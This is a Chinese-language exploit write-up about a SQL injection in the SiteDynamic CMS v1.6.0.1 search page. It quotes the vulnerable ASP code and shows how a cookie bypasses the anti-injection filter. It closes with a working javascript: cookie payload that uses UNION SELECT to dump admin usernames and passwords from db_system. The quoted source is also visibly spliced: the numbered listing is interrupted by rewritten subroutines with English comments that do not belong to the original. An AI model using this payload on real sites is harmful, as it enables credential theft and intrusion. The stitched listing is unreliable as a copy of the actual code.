文/My5t3ry
SiteDynamic企业网站管理系统 v1.6.0.1,我就不多说了,用的站也不多,这是帮朋友挖的洞;论坛上熙雅就发过它所用 fckeditor 编辑器的上传漏洞。废话不多说,看代码:
001// /page/default.asp 5-122行
002
003
004 <%
005 pageID=strCLng(Trim(Request("pageID")))
006 ID=strCLng(Trim(Request("ID")))
007
008 If isNumeric(pageID) = False Then
009 FoundErr=True
010 Message=Message & "<li>参数错误!</li>"
011 End If
012
013 if FoundErr<>True then
014
015 if ID=0 then
016
017 If pageID<>0 Then
018 set rs=server.CreateObject("adodb.recordset")
019 sql="Select * from db_channel where pageID="&pageID
020 rs.open sql,conn,1,1
021 pageName=rs("pageName")
022 description=rs("description")
023 keywords=rs("keywords")
024 pic=rs("pic")
025 link=rs("link")
026 PageMode=rs("PageMode")
027 PageAmount=rs("PageAmount")
028 PageLine=rs("PageLine")
029 intro=rs("intro")
030
031 If Not rs.Eof Then
032 if rs("pageID")>0 then
033 if rs("ChiID")>0 then
034 strChiID=""
035 set strRs=conn.execute("select pageID from db_channel where ParentID=" & rs("pageID") & " or ParentPath like '" & rs("ParentPath") & "," & rs("pageID") & ",%'")
036
037 do while not strRs.eof
038 if strChiID="" then
039 strChiID=strRs(0)
040 else
041 strChiID=strChiID & "," & strRs(0)
042 end if
043 strRs.movenext
044 loop
045 else
046 strChiID=pageID
047 end if
048 end if
049 end If
050 rs.close
051 set rs=nothing
052
053 sql="select * from db_page Where pageID in ("&strChiID&")"
054 Else
055 sql="select * from db_page where 1=1"
056 End If
057 else
058 sql="select * from db_page where ID="&ID&""
059 End if
060
061 if not (Trim(Request("keyword"))="" or isempty(Trim(Request("keyword"))) ) then
062 sql=sql&" and (title like '%" & Trim(Request("keyword")) & "%' or content like '%" & Trim(Request("keyword")) & "%')" //bugs
063 end if
064
065 sql=sql&" order by dateandtime desc"
066 'response.write sql
067 'response.end
068 set rs=server.CreateObject("adodb.recordset")
069 rs.open sql,conn,1,1
070
071 if ID<>0 then
072 if Trim(rs("PageMode"))=4 then
073 response.redirect Trim(rs("URL"))
074 end if
075 '文件类型
076 if Trim(rs("PageMode"))=3 then
077 filesURL=Trim(rs("files"))
078 If filesURL = "" Then
079 response.write "No data!"
080 End If
081 Call Getdownload(filesURL)
082 end if
083
084 srtTitle=Trim(rs("Title"))
085 srtPageID=Trim(rs("pageID"))
086 description=rs("description")
087 keywords=rs("keywords")
088 end if
089
Sub getTitle()
    ' Writes the heading of the current view: the fixed "全文检索" label for the global
    ' search, the channel name when a channel is selected, otherwise the page title.
    ' Reads the globals pageID, ID, pageName and srtTitle set by the page header.
    Dim heading
    If pageID <> 0 Then
        heading = "" & pageName & ""
    ElseIf ID <> 0 Then
        heading = "" & srtTitle & ""
    Else
        heading = "全文检索"
    End If
    Response.Write heading
End Sub
099
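Sub getadoTitle()
    ' Writes the channel name for the current view: the fixed "全文检索" label for the
    ' global search, the already-loaded pageName for a channel view, and for a single
    ' page the name of the channel that owns the row in the open recordset "rs".
    ' Reads the globals pageID, ID, pageName, rs and conn.
    '
    ' Changes versus the original: the throw-away "adodb.recordset" that conn.Execute
    ' immediately replaced is gone, the lookup is checked for Eof before a field is
    ' read, and the lookup recordset is closed afterwards.
    If pageID = 0 And ID = 0 Then
        Response.Write "全文检索"
    ElseIf pageID <> 0 Then
        Response.Write "" & pageName & ""
    ElseIf ID <> 0 Then
        ' the channel id comes from the db_page row, not from the request; CLng keeps the
        ' value that is spliced into the SQL text numeric
        doPageID = CLng(rs("PageID"))
        Set doRs = conn.Execute("Select pageName From db_channel Where pageID=" & doPageID)
        If Not doRs.Eof Then
            Response.Write "" & Trim(doRs("pageName")) & ""
        End If
        doRs.Close
        Set doRs = Nothing
    End If
End Sub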
112
Sub getLocation()
    ' Writes the breadcrumb of the current view: a fixed "->>全文检索" crumb for the global
    ' search, otherwise the channel trail produced by Nav() — keyed by the page's own
    ' channel (srtPageID) when a single page is shown, else by the requested pageID.
    ' Reads the globals pageID, ID and srtPageID; Nav is defined elsewhere.
    Dim navKey
    If pageID = 0 And ID = 0 Then
        Response.Write "->>全文检索"
        Exit Sub
    End If
    If ID <> 0 Then
        navKey = srtPageID
    Else
        navKey = pageID
    End If
    Call Nav(navKey)
End Sub
这套系统包含了防注入模块,但只检测 Request.QueryString 和 Request.Form;上面代码中 keyword 是通过 Request() 获取的,而 Request() 还会读取 Cookies,所以可以用 Cookie 来绕过防注。
利用代码
javascript:alert(document.cookie="keyword=" + escape("a%') union select 1,2,3,username&chr(124)&Password,5,6,7,8,9,0,1,2,3,4,5,6 from db_system union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 from db_page where 1=2 and (title like '%a"));location.href="/page/Default.asp?pageID=0";
漏洞很简单,没什么好说的。要说的一点是:很多朋友遇到搜索型注入都直接盲注了,其实只要闭合得好,还是可以使用 union 的。
PS:重点在于利用技巧——注入语句的写法。